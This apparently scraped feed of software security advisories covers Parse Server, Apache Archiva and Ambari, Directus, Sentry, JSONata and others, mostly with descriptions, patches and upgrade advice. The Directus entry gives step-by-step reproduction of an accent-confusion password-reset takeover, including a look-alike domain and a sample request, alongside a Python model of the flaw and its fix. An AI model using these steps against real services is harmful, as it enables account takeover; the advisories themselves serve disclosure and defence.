- https://github.com/parse-community/parse-server/security/advisories/GHSA-6927-3vr9-fxf2
- https://github.com/parse-community/parse-server/releases/tag/6.5.0 (fixed in Parse Server 6)
- https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.20 (fixed in Parse Server 7 alpha release)
### Credits
- Mikhail Shcherbakov (https://twitter.com/yu5k3) working with Trend Micro Zero Day Initiative (finder)
- Ehsan Persania (remediation developer)
- Manuel Trezza (coordinator)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6927-3VR9-FXF2
01.03.2024 23:46:44 | maven | [MAVEN:GHSA-HP2X-6VRM-7J7V] Apache Archiva Reflected Cross-site Scripting vulnerability (moderate) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure an HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HP2X-6VRM-7J7V
01.03.2024 22:12:22 | maven | [MAVEN:GHSA-RV4H-M4WC-V99W] Apache Archiva Incorrect Authorization vulnerability (moderate) | ** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva. Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RV4H-M4WC-V99W
01.03.2024 22:12:19 | maven | [MAVEN:GHSA-H595-VWHC-3XWX] Apache Archiva Incorrect Authorization vulnerability (moderate) | ** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H595-VWHC-3XWX
01.03.2024 20:58:44 | npm | [NPM:GHSA-QW9G-7549-7WG5] Directus has MySQL accent insensitive email matching (high)
## Password reset vulnerable to accent confusion
The password reset mechanism of the Directus backend is implemented in a way where, combined with (specific, need to double check if I can work around) configuration in MySQL or MariaDB, it allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons.
MySQL weak comparison:
```sql
select 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de';
```
This is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database.
### Steps to reproduce:
1. If the attacker knows the email address of the victim user, i.e., `julian@cure53.de`. (possibly just the domain could be enough for an educated guess)
2. An off-by-one accented domain `cüre53.de` can be registered to be able to receive emails.
3. With this email the attacker can request a password reset for `julian@cüre53.de`.
```http
POST /auth/password/request HTTP/1.1
Host: example.com
[...]
{"email":"julian@cüre53.de"}
```
4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address.
5. With this email the attacker can log into the target account and use it for nefarious things.
### Workarounds
Should be possible with collations but haven't been able to confirm this.
### References
- https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/
- https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QW9G-7549-7WG5
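The Directus entry above has two moving parts: an accent- and case-insensitive collation that makes `julian@cüre53.de` match `julian@cure53.de`, and an API that then mails the caller-supplied address rather than the stored one. The block below is an added, self-contained illustration written for this page (not Directus code) that reproduces both parts against an in-memory SQLite table and shows the two remedies the advisory points at. The `AI_CI` collation is a simplified model of MySQL's `utf8mb4_0900_ai_ci` (NFKD, strip combining marks, casefold; real MySQL uses Unicode collation weights), the table and its single user row are constructed sample data, and the function names are this example's own.

```python
import sqlite3
import unicodedata


def ai_ci_key(s):
    """Approximate an accent- and case-insensitive collation key such as
    MySQL's utf8mb4_0900_ai_ci produces: NFKD-decompose, drop combining
    marks, casefold. Simplification for the example; MySQL uses UCA weights."""
    decomposed = unicodedata.normalize("NFKD", s)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch)).casefold()


def _ai_ci_collate(a, b):
    ka, kb = ai_ci_key(a), ai_ci_key(b)
    return (ka > kb) - (ka < kb)


def build_db():
    """In-memory stand-in for directus_users with the loose collation on the
    email column. The user row is constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.create_collation("AI_CI", _ai_ci_collate)
    conn.execute(
        "CREATE TABLE directus_users (id INTEGER PRIMARY KEY, email TEXT COLLATE AI_CI)"
    )
    conn.execute("INSERT INTO directus_users (email) VALUES (?)", ("julian@cure53.de",))
    conn.commit()
    return conn


def find_user_loose(conn, email):
    """The weak comparison from the advisory: the column's AI_CI collation
    decides equality, so an accented look-alike matches."""
    return conn.execute(
        "SELECT id, email FROM directus_users WHERE email = ?", (email,)
    ).fetchone()


def find_user_exact(conn, email):
    """Collation workaround: force a byte-wise comparison in the query."""
    return conn.execute(
        "SELECT id, email FROM directus_users WHERE email = ? COLLATE BINARY", (email,)
    ).fetchone()


def reset_recipient_vulnerable(conn, supplied_email):
    """Flawed flow: loose lookup, then mail the *supplied* address."""
    row = find_user_loose(conn, supplied_email)
    return None if row is None else supplied_email


def reset_recipient_fixed(conn, supplied_email):
    """Remedy from the advisory: mail the address stored on the matched
    account, never the caller-controlled string."""
    row = find_user_loose(conn, supplied_email)
    return None if row is None else row[1]
```

Both remedies are worth applying: mailing the stored address closes the account-takeover path even if the collation stays loose, and an explicit binary (or accent-sensitive) collation on the lookup stops look-alike addresses from matching at all. The SQL `COLLATE` override is the portable form of the advisory's collation workaround; in MySQL the equivalent is a `_bin` or `_as_cs` collation on the column or in the comparison.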
01.03.2024 18:57:57 | npm | [NPM:GHSA-68C2-4MPX-QH95] Potential leakage of Sentry auth tokens by React Native SDK with Expo plugin (low)
### Impact
SDK versions between and including 5.16.0 and 5.19.0 allowed Sentry auth tokens to be set in the optional authToken configuration parameter, for debugging purposes. Doing so would result in the auth token being built into the application bundle, and therefore the auth token could be potentially exposed in case the application bundle is subsequently published.
You may ignore this notification if you are not using the `authToken` configuration parameter in your React Native SDK configuration or did not publish apps using this way of configuring the `authToken`.
If you had set the `authToken` in the plugin config previously, and built and published an app with that config, you should [rotate your token](https://docs.sentry.io/product/accounts/auth-tokens/).
### Patches
The behavior that allowed setting an `authToken` parameter was fixed in SDK version 5.19.1 where, if this parameter was set, you will see a warning and the `authToken` would be removed before bundling the application.
### Workarounds
1. Remove `authToken` from the plugin configuration.
2. If you had set the `authToken` in the plugin config previously, and built and published an app with that config, you should [rotate your token](https://docs.sentry.io/product/accounts/auth-tokens/).
### References
* [sentry-react-native 5.19.1 release notes](https://github.com/getsentry/sentry-react-native/releases/tag/5.19.1)
* https://github.com/getsentry/sentry-docs/pull/9244
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-68C2-4MPX-QH95
01.03.2024 23:44:47 | maven | [MAVEN:GHSA-9Q6V-RXMW-G3GH] Apache Ambari: Various Cross site scripting problems (moderate) | Lack of proper input validation and constraint enforcement in Apache Ambari prior to 2.7.8. Impact: as it is stored XSS, it could be exploited to perform unauthorized actions, ranging from data access to session hijacking and delivering malicious payloads. Users are recommended to upgrade to version 2.7.8, which fixes this issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9Q6V-RXMW-G3GH
01.03.2024 18:58:16 | npm | [NPM:GHSA-FFFG-CWC9-XVJ7] mongo-express Cross-site Request Forgery vulnerability (moderate) | In mongo-express 1.0.2, /admin allows CSRF, as demonstrated by deletion of a Collection. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FFFG-CWC9-XVJ7
01.03.2024 18:57:13 | npm | [NPM:GHSA-6JVG-HP25-42F6] Nteract Remote Code Execution vulnerability (moderate) | Nteract v0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6JVG-HP25-42F6
01.03.2024 02:00:00 | oraclelinux | [ELSA-2024-12189] conmon security update (important) | package changelogs by package (entries separated by ";", sub-items by "/"):
conmon: [2.1.3-8] address CVE-2023-39326; [2.1.3-7] Resolve CVE-2023-39325; [2.1.3-6] Add ol8_baseos_latest, and ol9_baseos_latest, to Jenkinsfile; [2.1.3-5] Add systemd-devel as build requirement; [2.1.3-4] Add support ARM build; [2.1.3.3] Add OL9 support; [2.1.3.2] Update inline with Linux team building conmon for all but OL7; [2.1.3-1] Added build scripts
cri-o: [1.25.5-1] Added Oracle Specific Files for cri-o
cri-tools: [1.25.0-3] Resolve CVE-2023-39326; [1.25.0-2] Resolve CVE-2023-39325; [1.25.0-1] Added Oracle Specific Build Files for cri-tools
flannel-cni-plugin: [1.0.1-4] Resolve CVE-2023-39326; [1.0.1-3] Resolve CVE-2023-44487 and CVE-2023-39325; [1.0.1-2] Add support for Oracle Linux 9; [1.0.1-1] Added Oracle specific build files for Flannel CNI Plugins
helm: [3.11.1-3] address CVE-2023-39326; [3.11.1-2] address CVE-2023-44487 and CVE-2023-39325; [3.11.1-1] Added Oracle Specific build Files
istio: [1.16.7-3] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.16.7-1] Addresses CVE CVE-2023-35941, CVE-2023-35942, CVE-2023-35943, CVE-2023-35944
kata: [1.12.1-17] Include OL9 for kernel-uek-container (currently in UEKR7_developer_preview); [1.12.1-16] Rebuild with golang 1.20.12; [1.12.1-15] Updated for kubernetes 1.27 and 1.28; [1.12.1-14] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-13] Rebuild kata to fix timestamp issue; [1.12.1-12] Add support for ARM build; [1.12.1-11] Add OL9 support; [1.12.1-10] Updated kata-runtime version to work with more versions of kvm_utils; [1.21.1-9] updated cri-o and cri-tools versions to support olcne-1.6.0; [1.12.1-7] Updated kernel_uek_max and kernel_uek_container_max to 5.16 to support UEKR7 host and guest kernel. Note: installed kernel < 5.16; [1.12.1-6] updated cri-o and cri-tools versions to support olcne-1.5.0; [1.12.1-5] updated cri-o and cri-tools versions to support kubernetes-1.23; [1.12.1-4] update kata-image versions / update kernel-uek-container version to kernel-uek-container-5.4.17-2136.306.1.3; [1.21.1-3] Support k8s 1.21.6 / updated kernel-uek-container version / updated kata-image versions / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Updated to kata 1.12.1 / Updated guest kernel (kernel-uek-container) minimum version to UEK6U2 (5.4.17-2102.200.7)
kata-agent: [1.12.1-11] Rebuild with -11 tag; [1.12.1-10] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.12.1-9] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-8] Remove build_date global variable in kata-image specfile; [1.12.1-7] Add support for ARM build; [1.12.1-6] Add OL9 support; [1.12.1-4] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.12.1-3] updated golang version / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Added Oracle Specific Build Files for kata-agent
kata-image: [1.12.1-11] Rebuild with -11 tag; [1.12.1-10] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.12.1-9] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-8] Remove build_date global variable in specfile; [1.12.1-7] Add support for ARM build; [1.12.1-6] Restore OL7 and bump release; [1.12.1-5] Add support for Oracle Linux 9; [1.12.1-4] build for kata-agent-1.12.1-4; [1.12.1-3] updated golang version / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Added Oracle Specific Build Files for kata-image
kata-ksm-throttler: [1.12.1-11] Rebuild with -11 tag; [1.12.1-10] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.12.1-9] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-8] Bump release inline with other kata packages for fixing timestamp issue; [1.12.1-7] Add support for ARM build; [1.12.1-6] Bump release inline with others for reversion of removal of OL7; [1.12.1-5] Add support for Oracle Linux 9; [1.12.1-4] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.12.1-3] updated golang version / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Added Oracle Specific Build Files for kata-ksm-throttler
kata-proxy: [1.12.1-11] Rebuild with -11 tag; [1.12.1-10] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.12.1-9] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-8] Bump release inline with other kata packages for fixing timestamp issue; [1.12.1-7] Add support for ARM build; [1.12.1-6] Revert OL7 removal; [1.12.1-5] Add support for Oracle Linux 9; [1.12.1-4] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.12.1-3] updated golang version / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Added Oracle Specific Build Files for kata-proxy
kata-runtime: [1.12.1-11] Rebuild with -11 tag; [1.12.1-10] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.12.1-9] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-8] Bump release inline with other kata packages for fixing timestamp issue; [1.12.1-7] Add support for ARM build; [1.12.1-6] Add OL9 support; [1.12.1-5] Updated qemu-kvm machine options to work with more versions of kvm_utils; [1.12.1-4] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.12.1-3] updated golang version / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Added Oracle Specific Files For kata-runtime
kata-shim: [1.12.1-11] Rebuild with -11 tag; [1.12.1-10] Updated Golang to 1.20.12 to address CVE CVE-2023-39326; [1.12.1-9] Updated to address CVE-2023-44487 and CVE-2023-39325; [1.12.1-8] Bump release inline with other kata packages for fixing timestamp issue; [1.12.1-7] Add support for ARM build; [1.12.1-6] Bump release inline with others for reversion of removal of OL7; [1.12.1-5] Add support for Oracle Linux 9; [1.12.1-4] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.12.1-3] updated golang version / added buildhost variable; [1.12.1-2] Golang 1.15.9; [1.12.1-1] Added Oracle Specific Build Files for kata-shim
kubernetes: [1.25.15-2] Address CVE-2023-39326 by upgrading golang to 1.20.12; [1.25.15-1] Added Oracle specific build files for Kubernetes
kubernetes-cni: [1.0.1-4] address CVE-2023-39326; [1.0.1-3] Resolve CVE-2023-44487 and CVE-2023-39325; [1.0.1-2] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.0.1-1] Added Oracle specific build files for Kubernetes CNI
kubernetes-cni-plugins: [1.0.1-5] address CVE-2023-39326; [1.0.1-3] Resolve CVE-2023-44487 and CVE-2023-39325; [1.0.1-3] Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper; [1.0.1-2] Add flannel-cni-plugins as a dependency; [1.0.1-1] Added Oracle specific build files for Kubernetes CNI Plugins
olcne: [1.6.6-3] Fixed pod-network:calico update; [1.6.6-2] Added conmon resource to kubernetes module; [1.6.6-1] Rebuilt modules, and components, with golang 1.20.12 to address CVE-2023-39326 / Updated CRI-O to v1.25.5; [1.6.5-9] Mark container-registry as updatable; [1.6.5-9] update metallb 0.12.1 to address CVE-2023-44487 and CVE-2023-39325; [1.6.5-8] Update externalip-webhook 1.0.0-3 to address CVE-2023-44487, CVE-2023-39325; [1.6.5-7] Update multus-cni 3.9.3 to address CVE-2023-44487 and CVE-2023-39325; [1.6.5-6] Update rook-1.10.9 to address CVE-2023-44487, CVE-2023-39325; [1.6.5-5] Update Istio, Grafana, Prometheus, and Kubernetes-dashboard to address CVEs CVE-2023-44487, CVE-2023-39325; [1.6.5-4] Update kubernetes and components to address golang CVE-2023-44487, CVE-2023-39325; [1.6.5-3] update configmap-registry to 1.28.0 to address CVE-2023-44487 and CVE-2023-39325; [1.6.5-2] Update kubevirt 0.58.0 to address CVE-2023-44487 and CVE-2023-39325; [1.6.5-1] Update calico image versions to address golang CVE-2023-44487, CVE-2023-39325; [1.6.4-1] Fix GetNodeByAddr string comparison / hostnames case insensitive comparison; [1.6.3-1] Add Istio-1.16.7 to address CVEs CVE-2023-35941, CVE-2023-35942, CVE-2023-35943, CVE-2023-35944; [1.6.2-1] CVE-2023-2727, CVE-2023-2728 Kubernetes upgraded to 1.25.11 / Add all modules to registry-image-helper / update yq to 4.x; [1.6.1-9] Updated the CVE IDs in Istio-1.16.4 changelog entry; [1.6.1-8] Update Istio config to include 1.15.7 to support upgrade from 1.5.x to 1.6.x; [1.6.1-7] Bugfix: Append a slash in oci-instance-metadata query url; [1.6.1-6] Fixed helm installation in OLCNE upgrade; [1.6.1-5] Deprecate oci-private-key <path-on-control-plane-nodes> in favour of oci-private-key-file <path-on-operator-node> / Updated olcne_version argument in olcnectl provision to support <major.minor.patch>; [1.6.1-4] Update Istio version to 1.16.4 to address CVEs CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487; [1.6.1-3] Resolved the issue to install multiple network cards using multus; [1.6.1-2] Update kubelet for upstream runc misc cgroups patch; [1.6.1-1] Fix the bug olcnectl provision fails if ol8_developer does not exist; [1.6.0-4] Removed PodSecurityPolicy from the Grafana Helm chart due to the removal of the API in Kubernetes 1.25 / Fixed an issue where creating an instance of the Istio module without Helm already installed would fail; [1.6.0-3] Move template to olcne-api-server and provide default calico config; [1.6.0-2] Update KubeVirt version to 0.58.0; [1.6.0-1] Update Kubernetes version to 1.25.7 / Update Helm version to 3.11.1 / Update Istio version to 1.16.2 / Add Calico CNI 3.25 / Add Multus CNI 3.9.3 / Technical preview for KubeVirt 0.52.0 / Technical preview for Rook 1.10.9 / Add subcommand to olcnectl that lists version information for modules / Add support for --control-plane-nodes argument to the Kubernetes module for specifying control plane nodes / olcnectl provision can now update existing module instances / Deprecate Helm module in favor of automatically installing Helm with Kubernetes / Deprecate --master-nodes argument to the Kubernetes module / Deprecate Kata container runtime / Deprecate Flannel CNI / Deprecate GlusterFS CSI Driver; [1.5.11-1] Expose metrics endpoints for kube-system services / Support installation with or without firewalld running / Open port 9100 on nodes when installing Kubernetes module / Make disable swap persist after reboot of control plane node; [1.5.10-2] Update istio to 1.15.3 to address Istio CVE-2022-392787; [1.5.9-1] Fix a regression during provisioning where arguments for the externalip restriction webhook are handled incorrectly; [1.5.8-4] Fix 1.21 kubernetes version to align with last upstream release; [1.5.8-3] Increase timeout value for update module; [1.5.8-2] Resolve kubernetes CVE-2022-3294 & CVE-2022-3162 for version 1.24 / for version 1.23 / for version 1.22 / for version 1.21; [1.5.8-1] Improve error reporting and logging when using olcnectl provision / Environment creation is now idempotent; [1.5.7-6] Unpinned podman for OL7; [1.5.7-5] Updated the kubernetes-dashboard version to v2.5.1 in the registry-image-helper.sh script for kubernetes-1.24.5; [1.5.7-4] Upgraded helm-3.7.1 to 3.9.4; [1.5.7-3] Resolved kubernetes-1.22.14 upgrade issue; [1.5.7-1] Upgrade Kubernetes to 1.24.5 / Upgrade Istio to 1.14.3 / Update OCI-CCM to 1.24.0 for kubernetes 1.24 / Update kubernetes-dashboard to v2.5.1 / Added support for custom profiles to the Istio module / Added support for multiple instances of the Istio module with independent profiles / Implemented automation within olcnectl for provisioning of Platform components and modules for existing compute resources; [1.5.6-1] Upgraded kubernetes-1.23.7 to 1.23.11, 1.22.8 to 1.22.14 and 1.21.6 to 1.21.14 / Resolve Kubernetes CVE-2022-3172 for version 1.21 / for version 1.22 / for version 1.23; [1.5.5-1] Upgrade Istio from 1.13.5 to 1.13.7 to resolve the CVE-2022-31045; [1.5.4-3] Fix bug in gen-certs-helper script to change permission of node.key to allow opc user to copy over; [1.5.4-2] Istio CVE-2022-31045, CVE-2022-29225, CVE-2022-29224, CVE-2022-29226, CVE-2022-29228, CVE-2022-29227; [1.5.4-1] Upgrade Kubernetes to 1.23.7; [1.5.3-1] Address qemu CVE-2022-26353, CVE-2021-3748; [1.5.2-1] Excluded unnecessary directories from k8s backup files; [1.5.1-1] Fixed the bug in fetching node metadata for non-cloud nodes; [1.5.0-2] Upgrade Helm to 3.7.1-2; [1.5.0-2] fix null pointer exception in systemd service state validation; [1.5.0-1] Introduce support for compact Kubernetes clusters / Introduce MetalLB / Introduce Oracle Cloud Infrastructure Cloud Controller Manager / Improved log messages in Platform API Server and Platform Agent / Upgrade Kubernetes to 1.22.8 / Upgrade Istio to 1.13.2 / Renamed the oci-csi module to oci-ccm; [1.5.0-20.alpha] Update istio-1.13.2 grafana to 7.5.15; [1.5.0-14.alpha] Metallb fix; [1.5.0-11.alpha] Remove module directories when olcne rpm is uninstalled; [1.5.0-10.alpha] OCI CCM 0.13.0; [1.5.0-9.alpha] Reworked log messages; [1.5.0-8.alpha] Update Istio to 1.13.2 (prometheus-2.31.1, grafana-8.4.6); [1.5.0-7.alpha] Update Istio to 1.12.6 (prometheus-2.30.1, grafana-7.5.15); [1.5.0-6.alpha] Update to k8s 1.22 with golang 1.17; [1.5.0-5.alpha] Update internal docs for oci-ccm module; [1.5.0-4.alpha] Extend oci-ccm module to support load balancer; [1.5.0-3.alpha] Firewall pre-req; [1.5.0-2.alpha] Ensure that config map settings needed by metallb is preserved during k8s upgrade; [1.5.0-1.alpha] Metallb module; [1.4.1-14] Added 1.4 extra images to registry-image-helper.sh script; [1.4.1-13] Update sudoers file and changed its permissions to '0440'; [1.4.1-12] Update olcne-kubernetes.md file for 'compact' flag; [1.4.1-11] Ensure that the order of items in an upgraded config file is stable with respect to the original file; [1.4.1-10] Ensure that old olcnectl config files are upgraded; [1.4.1-9] Rename oci-csi module to oci-ccm and add support for oci-ccm loadbalancer creation; [1.4.1-8] Make 'compact' flag updatable; [1.4.1-7] Introduce 'compact' that enables control-plane nodes to run any workloads; [1.4.1-6] Ability to label 1 or more kubernetes nodes; [1.4.1-5] Fixed a bug where specifying a port in the container-registry argument to the Kubernetes module would result in pods not being able to start; [1.4.1-4] Update helm to 3.7.1; [1.4.1-3] Update versions to Istio-1.12.2, prometheus-2.31.1 and grafana-7.5.11; [1.4.1-2] Allow loadbalancer to be configured regardless of security list mode; [1.4.0-4] Fix bug in initialising certs manager when environment name not mentioned; [1.4.0-3] Fix bug in fetching report for multi-environment; [1.4.0-2] Pause image is 3.4.1; [1.4.0-1] CSI plugin / Reports feature / Kubernetes-1.20.6 to Kubernetes-1.21.6 upgrade / Istio-1.9.4 to Istio-1.11.4 upgrade / Component upgrades / Config file feature; [1.3.0-13] Fix iptables issue when running on OL7 host using OL8 image; [1.3.0-12] Address CVEs ISTIO-SECURITY-2021-003, ISTIO-SECURITY-2021-005, ISTIO-SECURITY-2021-006, ISTIO-SECURITY-2021-007; [1.3.0-11] Fixed yaml file to stop olcne-nginx and keepalived services at uninstall [Orabug: 32296282]; [1.3.0-10] Fixed missing double semicolon in registry image helper; [1.3.0-9]
yq: [4.34.1-4] Update Golang to 1.20.12 to address CVE-2023-39326; [4.34.1-3] address CVE-2023-44487 and CVE-2023-3932A; [4.34.1-2] Add support for ARM build; [4.34.1-1] Added Oracle specific build files
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12189
01.03.2024 18:56:53 | maven | [MAVEN:GHSA-VR64-R9QJ-H27F] Clojure Denial of Service vulnerability (moderate)
An issue in Clojure versions 1.2.0 to 1.12.0-alpha5 allows an attacker to cause a denial of service (DoS) via the `clojure.core$partial$fn__5920` function.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VR64-R9QJ-H27F

01.03.2024 22:49:42 | maven | [MAVEN:GHSA-RGHC-9FHX-H32M] Apache Ambari: authenticated users could perform command injection to perform RCE (high)
Malicious code injection in Apache Ambari prior to 2.7.8. Users are recommended to upgrade to version 2.7.8, which fixes this issue.
Impact: A Cluster Operator can manipulate the request by adding a malicious code injection and gain root over the cluster main host.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RGHC-9FHX-H32M

01.03.2024 05:33:41 | rustsec | [RUSTSEC-2024-0018] ObjectPool creates uninitialized memory when freeing objects
As of version 0.6.0, the ObjectPool explicitly creates an uninitialized instance of its type parameter when it attempts to free an object, and swaps it into the storage. This causes instant undefined behavior due to reading the uninitialized memory in order to write it to the pool storage.
Extremely basic usage of the crate can trigger this issue, e.g. this code from a doctest:
```rust
use crayon::prelude::*;
application::oneshot().unwrap();
let mut params = MeshParams::default();
let mesh = video::create_mesh(params, None).unwrap();
// Deletes the mesh object.
video::delete_mesh(mesh); // <-- UB
```
The Clippy warning for this code was silenced in commit c2fde19caf6149d91faa504263f0bc5cafc35de5.
Discovered via https://asan.saethlin.dev/ub?crate=crayon&version=0.7.1
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0018

01.03.2024 18:55:54 | npm | [NPM:GHSA-RM97-X556-Q36H] sanitize-html Information Exposure vulnerability (moderate)
Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RM97-X556-Q36H

01.03.2024 07:06:26 | maven | [MAVEN:GHSA-44JG-JGJX-3XG5] Liferay Portal's Dynamic Data Mapping module's DDMForm and Liferay DXP vulnerable to stored Cross-site Scripting (critical)
Stored cross-site scripting (XSS) vulnerability in the Dynamic Data Mapping module's DDMForm in Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the instanceId parameter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-44JG-JGJX-3XG5

02.03.2024 23:32:13 | rubysec | [RUBYSEC:JSON-JWT-2023-51774] json-jwt allows bypass of identity checks via a sign/encryption confusion attack
The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allows bypass of identity checks via a sign/encryption confusion attack. For example, JWE can sometimes be used to bypass JSON::JWT.decode.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:JSON-JWT-2023-51774

03.03.2024 02:00:00 | gentoo | [GLSA-202403-02] Blender: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202403-02

03.03.2024 02:00:00 | gentoo | [GLSA-202403-01] Tox: Remote Code Execution (normal)
A vulnerability has been discovered in Tox which may lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202403-01

03.03.2024 02:00:00 | gentoo | [GLSA-202403-03] UltraJSON: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in UltraJSON, the worst of which could lead to key confusion and value overwriting.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202403-03

05.03.2024 00:16:36 | ubuntu | [USN-6653-4] Linux kernel (GKE) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-4

04.03.2024 22:43:50npm[NPM:GHSA-FQG8-VFV7-8FJ8] JSONata expression can pollute the "Object" prototype (high)### ImpactIn JSONata versions `>= 1.4.0, < 1.8.7` and `>= 2.0.0, < 2.0.4`, a malicious expression can use the [transform operator](https://docs.jsonata.org/other-operators#-------transform) to override properties on the `Object` constructor and prototype. This may lead to denial of service, remote code execution or other unexpected behavior in applications that evaluate user-provided JSONata expressions.### PatchThis issue has been fixed in JSONata versions `>= 1.8.7` and `>= 2.0.4`. Applications that evaluate user-provided expressions should update ASAP to prevent exploitation. The following patch can be applied if updating is not possible.```patch--- a/src/jsonata.js+++ b/src/jsonata.js@@ -1293,6 +1293,13 @@ var jsonata = (function() { } for(var ii = 0; ii < matches.length; ii++) { var match = matches[ii];+ if (match && (match.isPrototypeOf(result) || match instanceof Object.constructor)) {+ throw {+ code: "D1010",+ stack: (new Error()).stack,+ position: expr.position+ };+ } // evaluate the update value for each match var update = await evaluate(expr.update, match, environment); // update must be an object@@ -1539,7 +1546,7 @@ var jsonata = (function() { if (typeof err.token == 'undefined' && typeof proc.token !== 'undefined') { err.token = proc.token; }- err.position = proc.position;+ err.position = proc.position || err.position; } throw err; }@@ -1972,6 +1979,7 @@ var jsonata = (function() { "T1007": "Attempted to partially apply a non-function. 
Did you mean ${{{token}}}?", "T1008": "Attempted to partially apply a non-function", "D1009": "Multiple key definitions evaluate to same key: {{value}}",+ "D1010": "Attempted to access the Javascript object prototype", // Javascript specific "T1010": "The matcher function argument passed to function {{token}} does not return the correct object structure", "T2001": "The left side of the {{token}} operator must evaluate to a number", "T2002": "The right side of the {{token}} operator must evaluate to a number",```### Referenceshttps://github.com/jsonata-js/jsonata/releases/tag/v2.0.4### CreditThank you to Albert Pedersen of Cloudflare for disclosing this issue.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQG8-VFV7-8FJ8
